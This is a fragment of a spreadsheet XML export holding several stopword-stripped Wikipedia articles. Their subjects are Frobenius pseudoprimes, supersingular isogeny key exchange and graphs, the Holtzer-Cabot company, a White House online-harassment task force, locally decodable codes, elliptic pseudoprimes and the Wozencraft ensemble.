x^{2}-x-1} determined terms fibonacci numbers {\displaystyle f_{n}=u_{n}(1,-1)} lucas numbers {\displaystyle l_{n}=v_{n}(1,-1)} such frobenius pseudoprimes form sequence: 4181, 5777, 6721, 10877, 13201, 15251, 34561, 51841, 64079, 64681, 67861, 68251, 75077, 90061, 96049, 97921, 100127, 113573, 118441, 146611, 161027, 162133, 163081, 186961, 197209, 219781, 231703, 252601, 254321, 257761, 268801, 272611, 283361, 302101, 303101, 330929, 399001, 430127, 433621, 438751, 489601, (sequence a212424 oeis).while first lucas pseudoprime respect fibonacci polynomial {\displaystyle x^{2}-x-1} first frobenius pseudoprime respect polynomial 4181 (grantham stated 5777 multiple authors noted incorrect instead first pseudoprime {\displaystyle \left({\tfrac {5}{n}}\right)=-1} polynomial). another case, frobenius pseudoprimes respect quadratic polynomial {\displaystyle x^{2}-3x-1} determined using lucas {\displaystyle (3,-1)} sequence are: 119, 649, 1189, 4187, 12871, 14041, 16109, 23479, 24769, 28421, 31631, 34997, 38503, 41441, 48577, 50545, 56279, 58081, 59081, 61447, 75077, 91187, 95761, 96139, 116821, 127937, 146329, 148943, 150281, 157693, 170039, 180517, 188501, 207761, 208349, 244649, 281017, 311579, 316409, 349441, 350173, 363091, 371399, 397927, 423721, 440833, 459191, 473801, 479119, 493697, (sequence a327655 oeis)in case, first frobenius pseudoprime respect quadratic polynomial {\displaystyle x^{2}-3x-1} 119, also first lucas pseudoprime respect polynomial. besides, {\displaystyle \left({\tfrac {13}{119}}\right)=-1} quadratic polynomial {\displaystyle x^{2}-3x-5} i.e. {\displaystyle (p,q)=(3,-5)} sparser pseudoprimes compared many simple quadratics. using process above, sequence: 13333, 44801, 486157, 1615681, 3125281, 4219129, 9006401, 12589081, 13404751, 15576571, 16719781, ….notice pseudoprimes 500000, many frobenius pseudoprimes 500000. every entry sequence fermat pseudoprime base well lucas pseudoprime, converse true: 642001 psp-5 lucas (3,-5) pseudoprime, frobenius pseudoprime. (note lucas pseudoprime pair need fermat pseudoprime base |q|, e.g. 14209 lucas pseudoprime, fermat pseudoprime base strong frobenius pseudoprimes strong frobenius pseudoprimes also defined. details implementation quadratic polynomials found crandall pomerance. pseudoprimality tests conditions defining frobenius pseudoprime used testing given number probable primality. often tests rely fixed parameters {\displaystyle (p,q)} rather select certain depending input number order decrease proportion false positives, i.e., composite numbers pass test. sometimes composite numbers commonly called frobenius pseudoprimes, although correspond different parameters. using parameter selection ideas first laid baillie wagstaff (1980) part baillie–psw primality test used grantham quadratic frobenius test, create even better quadratic tests. particular, shown choosing parameters quadratic non-residues modulo (based jacobi symbol) makes stronger tests, reason success baillie–psw primality test. instance, parameters (p,2), first integer satisfies {\displaystyle \left({\tfrac {d}{n}}\right)=-1} pseudoprimes {\displaystyle 2^{64}} another test proposed khashin. given non-square number first computes parameter smallest prime jacobi symbol {\displaystyle \left({\tfrac {c}{n}}\right)=-1} verifies congruence: {\displaystyle (1+{\sqrt {c}})^{n}\equiv (1-{\sqrt {c}}){\pmod {n}}} .while prime pass test, composite passes frobenius pseudoprime {\displaystyle (p,q)=(2,1-c)} similar example, khashin notes pseudoprime found test. shows exist must factor less 128. properties computational cost frobenius pseudoprimality test respect quadratic polynomials roughly three times cost strong pseudoprimality test (e.g. single round miller–rabin primality test), times lucas pseudoprimality test, slightly baillie–psw primality test. note quadratic frobenius test stronger lucas test. example, 1763 lucas pseudoprime since u1764(3,-1) (mod 1763) (u(3,-1) given oeis: a006190), also passes jacobi step since 1763 {\displaystyle \left({\tfrac {13}{1763}}\right)=-1} fails frobenius test this property clearly seen algorithm formulated shown crandall pomerance algorithm 3.6.9 shown loebenberger, algorithm lucas test followed additional check frobenius condition. while quadratic frobenius test formal error bounds beyond lucas test, used basis methods much smaller error bounds. note steps, additional requirements, non-negligible additional computation beyond described page. important note error bounds methods apply standard strong frobenius tests fixed values (p,q) described page. based idea pseudoprimes, algorithms strong worst-case error bounds built. quadratic frobenius test, using quadratic frobenius test plus conditions, bound 7710 {\displaystyle {\tfrac {1}{7710}}} müller 2001 proposed mqft test bounds essentially 131040 {\displaystyle {\tfrac {1}{131040^{t}}}} damgård frandsen 2003 proposed eqft bound essentially 331776 {\displaystyle {\tfrac {256}{{331776}^{t}}}} seysen 2005 proposed sqft test bound 4096 {\displaystyle {\tfrac {1}{{4096}^{t}}}} sqft3 test bound 336442 {\displaystyle {\tfrac {16}{336442^{t}}}} given computational effort, offer better worst-case bounds commonly used miller–rabin primality test. also pseudoprime lucas pseudoprime ferdinand georg frobenius quadratic frobenius test references external links weisstein, eric "frobenius pseudoprime". mathworld. weisstein, eric "strong frobenius pseudoprime". mathworld. jacobsen, dana pseudoprime statistics, tables, data (data frobenius (1,-1) (3,-5) pseudoprimes)</t>
  </si>
  <si>
    <t>Supersingular isogeny key exchange</t>
  </si>
  <si>
    <t>supersingular isogeny diffie–hellman exchange (sidh) post-quantum cryptographic algorithm used establish secret parties otherwise insecure communications channel. analogous diffie–hellman exchange, based walks supersingular isogeny graph designed resist cryptanalytic attack adversary possession quantum computer. sidh boasts smallest sizes post-quantum exchanges; compression, sidh used 2688-bit public keys 128-bit quantum security level. sidh also distinguishes similar systems ntru ring-lwe supporting perfect forward secrecy, property prevents compromised long-term keys compromising confidentiality communication sessions. these properties makes sidh natural candidate replace diffie–hellman (dhe) elliptic curve diffie–hellman (ecdhe), widely used internet communication. however, sidh vulnerable key-recovery attack therefore insecure. introduction certain classes problems, algorithms running quantum computers naturally capable achieving lower time complexity classical computers. that quantum algorithms solve certain problems faster efficient algorithm running traditional computer. example, shor's algorithm factor integer polynomial time, best-known factoring classic algorithm, general number field sieve, operates sub-exponential time. this significant public cryptography security dependent infeasibility factoring integers, integer factorization problem. shor's algorithm also efficiently solve discrete logarithm problem, basis security diffie–hellman, elliptic curve diffie–hellman, elliptic curve dsa, curve25519, ed25519, elgamal. although quantum computers currently infancy, ongoing development quantum computers theoretical ability compromise modern cryptographic protocols (such tls/ssl) prompted development post-quantum cryptography.sidh created 2011 feo, jao, plut. uses conventional elliptic curve operations patented. sidh provides perfect forward secrecy thus rely security long-term private keys. forward secrecy improves long-term security encrypted communications, helps defend mass surveillance, reduces impact vulnerabilities like heartbleed. background j-invariant elliptic curve given weierstrass equation {\displaystyle y^{2}=x^{3}+ax+b} given formula: 1728 {\displaystyle j(e)=1728{\frac {4a^{3}}{4a^{3}+27b^{2}}}} .isomorphic curves j-invariant; algebraically closed field, curves j-invariant isomorphic. supersingular isogeny diffie-hellman protocol (sidh) works graph whose vertices (isomorphism classes supersingular elliptic curves whose edges isogenies curves. isogeny {\displaystyle \phi :e\to elliptic curves {\displaystyle {\displaystyle rational also group homomorphism. separable, {\displaystyle \phi determined kernel isomorphism target curve {\displaystyle setup sidh prime form {\displaystyle p=l_{a}^{e_{a}}\cdot l_{b}^{e_{b}}\cdot f\mp different (small) primes {\displaystyle l_{a}} {\displaystyle l_{b}} (large) exponents {\displaystyle e_{a}} {\displaystyle e_{b}} small cofactor {\displaystyle together supersingular elliptic curve {\displaystyle defined {\displaystyle \mathbb _{p^{2}}} such curve large torsion subgroups, {\displaystyle e[l_{a}^{e_{a}}]} {\displaystyle e[l_{b}^{e_{b}}]} assigned alice bob, respectively, indicated subscripts. each party starts protocol selecting (secret) random cyclic subgroup respective torsion subgroup computing corresponding (secret) isogeny. they publish, otherwise provide party with, equation target curve isogeny along information image party's torsion subgroup isogeny. this allows privately compute isogenies {\displaystyle whose kernels jointly generated secret cyclic subgroups. since kernels isogenies agree, target curves isomorphic. common j-invariant target curves taken required shared secret. since security scheme depends smaller torsion subgroup, recommended choose {\displaystyle l_{a}^{e_{a}}\approx l_{b}^{e_{b}}} excellent reference subject feo's article "mathematics isogeny based cryptography." security security sidh closely related problem finding isogeny mapping supersingular elliptic curves number points. feo, plut suggest best attack sidh solving related claw finding problem, hence complexity o(p1/4) classical computers o(p1/6) quantum computers. this suggests sidh 768-bit prime 128-bit security level. 2014 study isogeny mapping problem delfs galbraith confirmed o(p1/4) security analysis classical computers. classical security, o(p1/4), sidh confirmed work biasse, sankar well galbraith, petit, shani ti.castryck decru published july 2022 efficient recovery attack sike. using single core computer, sikep434 broken within approximately hour, sikep503 within approximately hours, sikep610 within approximately hours sikep751 within approximately hours. efficiency during exchange entities transmit information coefficients (mod defining elliptic curve elliptic curve points. each elliptic curve coefficient requires log2p2 bits. each elliptic curve point transmitted log2p2+1 bits, hence transmission 4log2p2 bits. this 6144 bits 768-bit modulus (128-bit security). however, reduced half 2640 bits (330 bytes) using key-compression techniques, latest appears recent work authors costello, jao, longa, naehrig, renes urbanik. with compression techniques, sidh similar bandwidth requirement traditional 3072-bit signatures diffie-hellman exchanges. this small space requirement makes sidh applicable context strict space requirement, bitcoin tor. tor's data cells must less bytes length, hold 330-byte sidh keys. contrast, ntruencrypt must exchange approximately bytes achieve 128-bit security cannot used within without increasing cell size.in 2014, researchers university waterloo developed software implementation sidh. they partially optimized code x86-64 processor running ghz. 768-bit modulus able complete exchange computations milliseconds thus demonstrating sidh computationally practical.in 2016, researchers microsoft posted software sidh runs constant time (thus protecting timing attacks) efficient implementation date. they write: "the size public keys bytes, significantly smaller popular post-quantum exchange alternatives. ultimately, size speed software illustrates strong potential sidh post-quantum exchange candidate hope results encourage wider cryptanalytic effort." code open source (mit) available github: https://github.com/microsoft/pqcrypto-sidh. 2016, researchers florida atlantic university developed efficient implementations sidh provided comparison affine projective coordinates. 2017, researchers florida atlantic university developed first fpga implementations sidh. supersingular isogeny diffie-hellman method while several steps sidh involve complex isogeny calculations, overall flow sidh parties straightforward familiar diffie-hellman exchange elliptic curve variant. setup these public parameters shared everyone network, negotiated parties beginning session. prime form {\displaystyle p=w_{a}^{e_{a}}\cdot w_{b}^{e_{b}}\cdot f\pm supersingular elliptic curve {\displaystyle {\displaystyle \mathbb _{p^{2}}} fixed elliptic points {\displaystyle p_{a},q_{a},p_{b},q_{b}} {\displaystyle order {\displaystyle p_{a}} {\displaystyle q_{a}} {\displaystyle (w_{a})^{e_{a}}} order {\displaystyle p_{b}} {\displaystyle q_{b}} {\displaystyle (w_{b})^{e_{b}}} exchange exchange, parties create isogeny common elliptic curve they creating random point kernel isogeny. kernel isogeny spanned {\displaystyle r_{a}} {\displaystyle r_{b}} respectively. different pairs points used ensure parties create different, non-commuting, isogenies. random point {\displaystyle r_{a}} {\displaystyle r_{b}} kernel isogenies created random linear combination points {\displaystyle p_{a}} {\displaystyle q_{a}} {\displaystyle p_{b}} {\displaystyle q_{b}} using {\displaystyle r_{a}} {\displaystyle r_{b}} parties velu's formulas creating isogenies {\displaystyle \phi _{a}} {\displaystyle \phi _{b}} respectively. from compute image pairs points {\displaystyle p_{a}} {\displaystyle q_{a}} {\displaystyle p_{b}} {\displaystyle q_{b}} {\displaystyle \phi _{b}} {\displaystyle \phi _{a}} isogenies respectively. result, pairs points {\displaystyle \phi _{b}(p_{a})} {\displaystyle \phi _{b}(q_{a})} {\displaystyle \phi _{a}(p_{b})} {\displaystyle \phi _{a}(q_{b})} respectively. exchange pairs points communications channel. pair points receive basis kernel isogeny. they linear coefficients used points received form point kernel isogeny create. they compute points {\displaystyle s_{ba}} {\displaystyle s_{ab}} velu's formulas construct isogenies. complete exchange, compute coefficients elliptic curves isogenies. they compute j-invariant curves. unless errors transmission, j-invariant curve created equal j-invariant curve created notationally, sidh exchange parties works follows: generates random integers {\displaystyle m_{a},n_{a}&lt;(w_{a})^{e_{a}}.} generates {\displaystyle r_{a}:=m_{a}\cdot (p_{a})+n_{a}\cdot (q_{a}).} uses point {\displaystyle r_{a}} create isogeny mapping {\displaystyle \phi _{a}:e\rightarrow e_{a}} curve {\displaystyle e_{a}} isogenous {\displaystyle applies {\displaystyle \phi _{a}} {\displaystyle p_{b}} {\displaystyle q_{b}} form points {\displaystyle e_{a}:\phi _{a}(p_{b})} {\displaystyle \phi _{a}(q_{b}).} sends {\displaystyle e_{a},\phi _{a}(p_{b})} {\displaystyle \phi _{a}(q_{b}).} same subscripts swapped. sends {\displaystyle e_{b},\phi _{b}(p_{a})} {\displaystyle \phi _{b}(q_{a}).} {\displaystyle m_{a},n_{a},\phi _{b}(p_{a})} {\displaystyle \phi _{b}(q_{a})} forms {\displaystyle s_{ba}:=m_{a}(\phi _{b}(p_{a}))+n_{a}(\phi _{b}(q_{a})).} uses {\displaystyle s_{ba}} create isogeny mapping {\displaystyle \psi _{ba}} uses {\displaystyle \psi _{ba}} create elliptic curve {\displaystyle e_{ba}} isogenous {\displaystyle computes j-invariant {\displaystyle k:={\text{ j-invariant }}(j_{ba})} curve {\displaystyle e_{ba}} similarly, {\displaystyle m_{b},n_{b},\phi _{a}(p_{b})} {\displaystyle \phi _{a}(q_{b})} forms {\displaystyle s_{ab}=m_{b}(\phi _{a}(p_{b}))+n_{b}(\phi _{a}(q_{b}))} uses {\displaystyle s_{ab}} create isogeny mapping {\displaystyle \psi _{ab}} uses {\displaystyle \psi _{ab}} create elliptic curve {\displaystyle e_{ab}} isogenous {\displaystyle computes j-invariant {\displaystyle k:={\text{ j-invariant }}(j_{ab})} curve {\displaystyle e_{ab}} curves {\displaystyle e_{ab}} {\displaystyle e_{ba}} guaranteed j-invariant. function {\displaystyle used shared key. sample parameters following parameters taken example al.:p prime exchange thus (263·341·11) base (starting) curve exchange luca feo, authors paper defining exchange posted software implements exchange parameters. similar systems, signatures, uses predecessor sidh published 2006 rostovtsev stolbunov. they created first diffie-hellman replacement based elliptic curve isogenies. unlike method feo, jao, plut, method rostovtsev stolbunov used ordinary elliptic curves found subexponential quantum attack.in march 2014, researchers chinese state integrated service networks xidian university extended security sidh form digital signature strong designated verifier. october 2014, soukharev university waterloo presented alternative method creating undeniable signatures designated verifier using elliptic curve isogenies. references</t>
  </si>
  <si>
    <t>Holtzer-Cabot</t>
  </si>
  <si>
    <t>holtzer-cabot boston, company founded 1875. they specialized small motors, fire alarm systems, telegraph-related products, various electric devices. company closed 1972. history charles holtzer founded company "holtzer co." began manufacturing simple electrical devices doorbells electric igniters. 1880, seth fuller partnered holtzer, company became known "seth fuller holtzer", later "fuller, holtzer company". george cabot joined business, fuller left 1889. company changed name "holtzer-cabot", remained name closing. 1891, company built electric four people moved approximately mph. first feature steering wheel, known first successful electric vehicle america, though unsuccessful prototypes built before. around turn 20th century, company branched create various telephone/telegraph-related products, clocks, fire alarm systems. they invented first shunt-type fire alarm system, local alarm pulled building would also trigger nearest municipal street fire alarm box. most fire alarm systems installed hospitals, factories, institutions. 1927, charles holtzer died. throughout world company branched even more, struggled retain business. 1972, company officially closed sold remainder lines eastern devices based dover (now known electrocraft). original factory jamaica plain, still exists, converted apartment complex. external links jamaica plain historical society: "holtzer-cabot electric company communitywalk: "holtzer-cabot electric company</t>
  </si>
  <si>
    <t>Supersingular isogeny graph</t>
  </si>
  <si>
    <t>mathematics, supersingular isogeny graphs class expander graphs arise computational number theory applied elliptic-curve cryptography. their vertices represent supersingular elliptic curves finite fields edges represent isogenies curves. definition properties supersingular isogeny graph determined choosing large prime number {\displaystyle small prime number {\displaystyle \ell considering class supersingular elliptic curves defined finite field {\displaystyle \mathbb _{p^{2}}} there approximately {\displaystyle (p+1)/12} curves, related isogenies. vertices supersingular isogeny graph represent curves concretely, j-invariants, elements {\displaystyle \mathbb _{p^{2}}} edges represent isogenies degree {\displaystyle \ell curves.the supersingular isogeny graphs {\displaystyle \ell -regular graphs, meaning vertex exactly {\displaystyle \ell neighbors. they proven pizer ramanujan graphs, graphs optimal expansion properties degree. proof based pierre deligne's proof ramanujan–petersson conjecture. cryptographic applications proposal cryptographic hash function involves starting fixed vertex supersingular isogeny graph, using bits binary representation input value determine sequence edges follow walk graph, using identity vertex reached walk hash value input. security proposed hashing scheme rests assumption difficult find paths graph connect arbitrary pairs vertices.it also proposed walks supersingular isogeny graphs vertex different edge sets (defined using different choices {\displaystyle \ell parameter) develop exchange primitive analogous diffie–hellman exchange, called supersingular isogeny exchange, suggested form post-quantum cryptography. however, supersingular isogeny exchange broken 2022 using non-quantum methods. references</t>
  </si>
  <si>
    <t>White House Task Force to Address Online Harassment and Abuse</t>
  </si>
  <si>
    <t>white house task force address online harassment abuse united states task force whose stated function address prevent online harassment abuse. particularly focus online harassment abuse lgbt people women, disproportionately affected. task force launched june 2022 announcement made vice president kamala harris. reception conservatives libertarians criticized task force, including former york congresswoman hayworth, media research center founder brent bozell, conservative commentator matt whitlock, libertarian organization young americans liberty. some accused task force similar recently paused disinformation governance board (dgb). conservatives also accused task force designed censor conservative speech.mike masnick techdirt also compared task force dgb, calling task force "extremely one-sided" claiming "one 'experts' last week's panel openly harassed supporter section merely reporting, neutrally, supreme court decision, suggesting people fake profiles sites send people rape supporter." masnick also raised concerns task force could violate first amendment, several participants task force expressed support removal section 230, future president could task force nefarious purposes. references</t>
  </si>
  <si>
    <t>Locally decodable code</t>
  </si>
  <si>
    <t>locally decodable code (ldc) error-correcting code allows single original message decoded high probability examining querying) small number bits possibly corrupted codeword. this property could useful, say, context information transmitted noisy channel, small subset data required particular time need decode entire message once. note locally decodable codes subset locally testable codes, though overlap two.codewords generated original message using algorithm introduces certain amount redundancy codeword; thus, codeword always longer original message. this redundancy distributed across codeword allows original message recovered good probability even presence errors. redundant codeword, resilient errors, fewer queries required recover original message. overview more formally, {\displaystyle (q,\delta ,\epsilon -locally decodable code encodes {\displaystyle -bit message {\displaystyle {\displaystyle -bit codeword {\displaystyle c(x)} {\displaystyle x_{i}} message recovered probability {\displaystyle 1-\epsilon using randomized decoding algorithm queries {\displaystyle bits codeword {\displaystyle c(x)} even {\displaystyle \delta locations codeword corrupted. furthermore, perfectly smooth local decoder decoder that, addition always generating correct output given access uncorrupted codeword, every {\displaystyle j\in [q]} {\displaystyle i\in [n]} {\displaystyle j^{th}} query recover {\displaystyle i^{th}} uniform {\displaystyle [n]} (the notation {\displaystyle [y]} denotes {\displaystyle \{1,\ldots ,y\}} informally, means queries required decode given uniformly distributed codeword. local list decoders another interesting subset local decoders. list decoding useful codeword corrupted {\displaystyle \delta places, {\displaystyle \delta minimum hamming distance codewords. case, longer possible identify exactly original message encoded, since could multiple codewords within {\displaystyle \delta distance corrupted codeword. however, given radius {\displaystyle \epsilon possible identify messages encode codewords within {\displaystyle \epsilon corrupted codeword. upper bound size messages determined {\displaystyle \delta {\displaystyle \epsilon .locally decodable codes also concatenated, message encoded first using scheme, resulting codeword encoded using different scheme. (note that, context, concatenation term used scholars refer usually called composition; this might useful example, first code desirable properties respect rate, undesirable property, producing codeword non-binary alphabet. second code transform result first encoding non-binary alphabet binary alphabet. final encoding still locally decodable, requires additional steps decode layers encoding. length codeword query complexity rate code refers ratio message length codeword length: {\displaystyle {\frac {|x|}{|c(x)|}}} number queries required recover message called query complexity code. rate code inversely related query complexity, exact shape tradeoff major open problem. known ldcs query codeword position, optimal codeword size query complexity exponential size original message. however, known tight lower bounds codes query complexity greater approaching tradeoff side codeword length, known codes codeword length proportional message length query complexity {\displaystyle k^{\epsilon {\displaystyle \epsilon there also codes between, codewords polynomial size original message polylogarithmic query complexity. applications locally decodable codes applications data transmission storage, complexity theory, data structures, derandomization, theory fault tolerant computation, private information retrieval schemes. data transmission storage locally decodable codes especially useful data transmission noisy channels. hadamard code special case reed muller codes) used 1971 mariner transmit pictures mars back earth. chosen 5-repeat code (where repeated times) because, roughly number bits transmitted pixel, higher capacity error correction. (the hadamard code falls general umbrella forward error correction, happens locally decodable; actual algorithm used decode transmission mars generic error-correction scheme.)ldcs also useful data storage, medium become partially corrupted time, reading device subject errors. cases, allow recovery information despite errors, provided relatively few. addition, ldcs require entire original message decoded; user decode specific portion original message without needing decode entire thing. complexity theory applications locally decodable codes complexity theory hardness amplification. using ldcs polynomial codeword length polylogarithmic query complexity, take function {\displaystyle l:\{0,1\}^{n}\rightarrow \{0,1\}} hard solve worst case inputs design function {\displaystyle l':\{0,1\}^{n}\rightarrow \{0,1\}} hard compute average case inputs. consider {\displaystyle limited length {\displaystyle inputs. then {\displaystyle binary string length {\displaystyle 2^{t}} {\displaystyle l(x)} {\displaystyle x\in \{0,1\}^{t}} polynomial length locally decodable code {\displaystyle polylogarithmic query complexity tolerates constant fraction errors encode string represents {\displaystyle create string length {\displaystyle 2^{o(t)}=2^{t'}} think string defining problem {\displaystyle length {\displaystyle inputs. {\displaystyle easy solve average, solve {\displaystyle correctly large fraction {\displaystyle 1-\epsilon inputs, properties used encode {\displaystyle probabilistically compute {\displaystyle inputs. thus, solution {\displaystyle inputs would allow solve {\displaystyle inputs, contradicting assumption {\displaystyle hard worst case inputs. private information retrieval schemes private information retrieval scheme allows user retrieve item server possession database without revealing item retrieved. common ensuring privacy {\displaystyle separate, non-communicating servers, copy database. given appropriate scheme, user make queries server individually reveal user looking for, together provide enough information user determine particular interest database.one easily locally decodable codes applications setting. general procedure produce {\displaystyle -server private information scheme perfectly smooth {\displaystyle -query locally decodable code follows: {\displaystyle perfectly smooth encodes {\displaystyle -bit messages {\displaystyle -bit codewords. preprocessing step, {\displaystyle servers {\displaystyle s_{1},\ldots ,s_{k}} encodes {\displaystyle -bit database {\displaystyle code {\displaystyle server stores {\displaystyle -bit codeword {\displaystyle c(x)} user interested obtaining {\displaystyle i^{th}} {\displaystyle randomly generates {\displaystyle queries {\displaystyle q_{1},\ldots q_{k}} {\displaystyle x_{i}} computed {\displaystyle c(x)_{q_{1}},\ldots c(x)_{q_{k}}} using local decoding algorithm {\displaystyle {\displaystyle user sends query different server, server responds requested. user uses {\displaystyle compute {\displaystyle x_{i}} responses. because decoding algorithm perfectly smooth, query {\displaystyle q_{j}} uniformly distributed codeword; thus, individual server gain information user's intentions, protocol private long servers communicate. examples hadamard code hadamard walsh-hadamard) code example simple locally decodable code maps string length {\displaystyle codeword length {\displaystyle 2^{k}} codeword string {\displaystyle x\in \{0,1\}^{k}} constructed follows: every {\displaystyle a_{j}\in \{0,1\}^{k}} {\displaystyle j^{th}} codeword equal {\displaystyle x\odot a_{j}} {\displaystyle x\odot y=\sum \limits _{i=1}^{k}x_{i}y_{i}} (mod easy every codeword hamming distance {\displaystyle {\frac {n}{2}}} every codeword. local decoding algorithm query complexity entire original message decoded good probability codeword corrupted less {\displaystyle {\frac {1}{4}}} bits. {\displaystyle \rho &lt;{\frac {1}{4}}} codeword corrupted {\displaystyle \rho fraction places, local decoding algorithm recover {\displaystyle i^{th}} original message probability {\displaystyle 1-2\rho proof: given codeword {\displaystyle index {\displaystyle algorithm recover {\displaystyle i^{th}} original message {\displaystyle works follows: {\displaystyle e^{j}} refer vector {\displaystyle \{0,1\}^{k}} {\displaystyle j^{th}} position elsewhere. {\displaystyle y\in \{0,1\}^{k}} {\displaystyle f(y)} denotes single {\displaystyle corresponds {\displaystyle x\odot algorithm chooses random vector {\displaystyle y\in \{0,1\}^{k}} vector {\displaystyle y'=y\oplus e^{i}} (where {\displaystyle \oplus denotes bitwise xor). algorithm outputs {\displaystyle f(y)\oplus f(y')} (mod correctness: linearity, {\displaystyle (x\odot y)\oplus (x\odot y')=(x\odot y)\oplus (x\odot (y\oplus e^{i}))=(x\odot y)\oplus (x\odot y)\oplus (x\odot e^{i})=x\odot e^{i}} {\displaystyle (x\odot e^{i})=x_{i}} need show {\displaystyle f(y)=x\odot {\displaystyle f(y')=x\odot good probability. since {\displaystyle {\displaystyle uniformly distributed (even though dependent), union bound implies {\displaystyle f(y)=x\odot {\displaystyle f(y')=x\odot probability least {\displaystyle 1-2\rho note: amplify probability success, repeat procedure different random vectors take majority answer. reed–muller code main idea behind local decoding reed-muller codes polynomial interpolation. concept behind reed-muller code multivariate polynomial degree {\displaystyle {\displaystyle variables. message treated evaluation polynomial predefined points. encode values, polynomial extrapolated them, codeword evaluation polynomial possible points. high level, decode point polynomial, decoding algorithm chooses {\displaystyle points line passes point interest {\displaystyle queries codeword evaluation polynomial points {\displaystyle interpolates polynomial. then simple evaluate polynomial point yield {\displaystyle this roundabout evaluating {\displaystyle useful algorithm repeated using different lines point improve probability correctness, queries uniformly distributed codeword. more formally, {\displaystyle \mathbb finite field, {\displaystyle l,d} numbers {\displaystyle d&lt;|\mathbb reed-muller code parameters {\displaystyle \mathbb ,l,d} function {\displaystyle \mathbb ^{\binom {l+d}{d}}\rightarrow \mathbb ^{|\mathbb |^{l}}} maps every {\displaystyle -variable polynomial {\displaystyle {\displaystyle \mathbb total degree {\displaystyle values {\displaystyle inputs {\displaystyle \mathbb ^{l}} that input polynomial form {\displaystyle p(x_{1},\ldots ,x_{l})=\sum \limits _{i_{1}+\ldots +i_{l}\leq d}c_{i_{1},\ldots ,i_{l}}x_{1}^{i_{1}}x_{2}^{i_{2}}\cdots x_{l}^{i_{l}}} specified interpolation {\displaystyle {\binom {l+d}{d}}} values predefined points output sequence {\displaystyle \{p(x_{1},\ldots ,x_{l})\}} every {\displaystyle x_{1},\ldots ,x_{l}\in \mathbb recover value degree {\displaystyle polynomial point {\displaystyle w\in \mathbb ^{n}} local decoder shoots random affine line {\displaystyle then picks {\displaystyle d+1} points line, uses interpolate polynomial evaluate point result {\displaystyle algorithm picks vector {\displaystyle v\in \mathbb ^{n}} uniformly random considers line {\displaystyle l=\{w+\lambda v\mid \lambda \mathbb {\displaystyle algorithm picks arbitrary subset {\displaystyle {\displaystyle \mathbb {\displaystyle |s|=d+1} queries coordinates codeword correspond points {\displaystyle w+\lambda {\displaystyle \lambda obtains values {\displaystyle \{e_{\lambda }\}} then uses polynomial interpolation recover unique univariate polynomial {\displaystyle degree less equal {\displaystyle {\displaystyle h(\lambda )=e_{\lambda {\displaystyle \lambda then, value {\displaystyle evaluates {\displaystyle h(0)} recover single value original message, chooses {\displaystyle points defines polynomial.each individual query distributed uniformly random codeword. thus, codeword corrupted {\displaystyle \delta fraction locations, union bound, probability algorithm samples uncorrupted coordinates (and thus correctly recovers bit) least {\displaystyle 1-(d+1)\delta decoding algorithms, see. also private information retrieval linear cryptanalysis references</t>
  </si>
  <si>
    <t>Elliptic pseudoprime</t>
  </si>
  <si>
    <t>number theory, pseudoprime called elliptic pseudoprime elliptic curve defined field rational numbers complex multiplication order {\displaystyle \mathbb {\big (}{\sqrt {-d}}{\big equation integers, point natural number jacobi symbol (mod number elliptic pseudoprimes less bounded above, large {\displaystyle x/\exp((1/3)\log x\log \log \log x/\log \log references gordon, daniel pomerance, carl (1991). "the distribution lucas elliptic pseudoprimes". mathematics computation. (196): 825–838. doi:10.2307/2938720. jstor 2938720. 0774.11074. external links weisstein, eric "elliptic pseudoprime". mathworld.</t>
  </si>
  <si>
    <t>Wozencraft ensemble</t>
  </si>
  <si>
    <t>coding theory, wozencraft ensemble linear codes codes satisfy gilbert-varshamov bound. named john wozencraft, proved existence. ensemble described massey (1963), attributes wozencraft. justesen (1972) used wozencraft ensemble inner codes construction strongly explicit asymptotically good code. existence theorem theorem: {\displaystyle \varepsilon &gt;0.} large enough {\displaystyle exists ensemble inner codes {\displaystyle c_{in}^{1},\cdots ,c_{in}^{n}} rate {\displaystyle {\tfrac {1}{2}}} {\displaystyle n=q^{k}-1} least {\displaystyle (1-\varepsilon values {\displaystyle i,c_{in}^{i}} relative distance {\displaystyle \geqslant h_{q}^{-1}\left({\tfrac {1}{2}}-\varepsilon \right)} .here relative distance ratio minimum distance block length. {\displaystyle h_{q}} q-ary entropy function defined follows: {\displaystyle h_{q}(x)=x\log _{q}(q-1)-x\log _{q}x-(1-x)\log _{q}(1-x).} fact, show existence linear codes, specify ensemble explicitly follows: {\displaystyle \alpha \mathbb _{q^{k}}-\{0\}} define inner code {\displaystyle {\begin{cases}c_{in}^{\alpha }:\mathbb _{q}^{k}\to \mathbb _{q}^{2k}\\c_{in}^{\alpha }(x)=(x,\alpha x)\end{cases}}} here notice {\displaystyle x\in \mathbb _{q}^{k}} {\displaystyle \alpha \mathbb _{q^{k}}} multiplication {\displaystyle \alpha since {\displaystyle \mathbb _{q}^{k}} isomorphic {\displaystyle \mathbb _{q^{k}}} this ensemble wozencraft called wozencraft ensemble. {\displaystyle x,y\in \mathbb _{q}^{k}} following facts: {\displaystyle c_{in}^{\alpha }(x)+c_{in}^{\alpha }(y)=(x,\alpha x)+(y,\alpha y)=(x+y,\alpha (x+y))=c_{in}^{\alpha }(x+y)} {\displaystyle a\in \mathbb _{q},ac_{in}^{\alpha }(x)=a(x,\alpha x)=(ax,\alpha (ax))=c_{in}^{\alpha }(ax)} {\displaystyle c_{in}^{\alpha linear code every {\displaystyle \alpha \mathbb _{q^{k}}-\{0\}} know wozencraft ensemble contains linear codes rate {\displaystyle {\tfrac {1}{2}}} following proof, show least {\displaystyle (1-\varepsilon linear codes relative distance {\displaystyle \geqslant h_{q}^{-1}\left({\tfrac {1}{2}}-\varepsilon \right)} i.e. meet gilbert-varshamov bound. proof prove least {\displaystyle (1-\varepsilon number linear codes wozencraft ensemble relative distance {\displaystyle \geqslant h_{q}^{-1}\left({\tfrac {1}{2}}-\varepsilon \right)} prove {\displaystyle \varepsilon number linear codes relative distance {\displaystyle &lt;h_{q}^{-1}\left({\tfrac {1}{2}}-\varepsilon \right)} i.e., distance {\displaystyle &lt;h_{q}^{-1}\left({\tfrac {1}{2}}-\varepsilon \right)\cdot 2k.} notice linear code, distance equal minimum weight codewords code. this fact property linear code. non-zero codeword weight {\displaystyle &lt;h_{q}^{-1}\left({\tfrac {1}{2}}-\varepsilon \right)\cdot code distance {\displaystyle &lt;h_{q}^{-1}\left({\tfrac {1}{2}}-\varepsilon \right)\cdot 2k.} {\displaystyle linear codes distance {\displaystyle &lt;h_{q}^{-1}\left({\tfrac {1}{2}}-\varepsilon \right)\cdot 2k.} then {\displaystyle |p|} linear codes codeword weight {\displaystyle &lt;h_{q}^{-1}\left({\tfrac 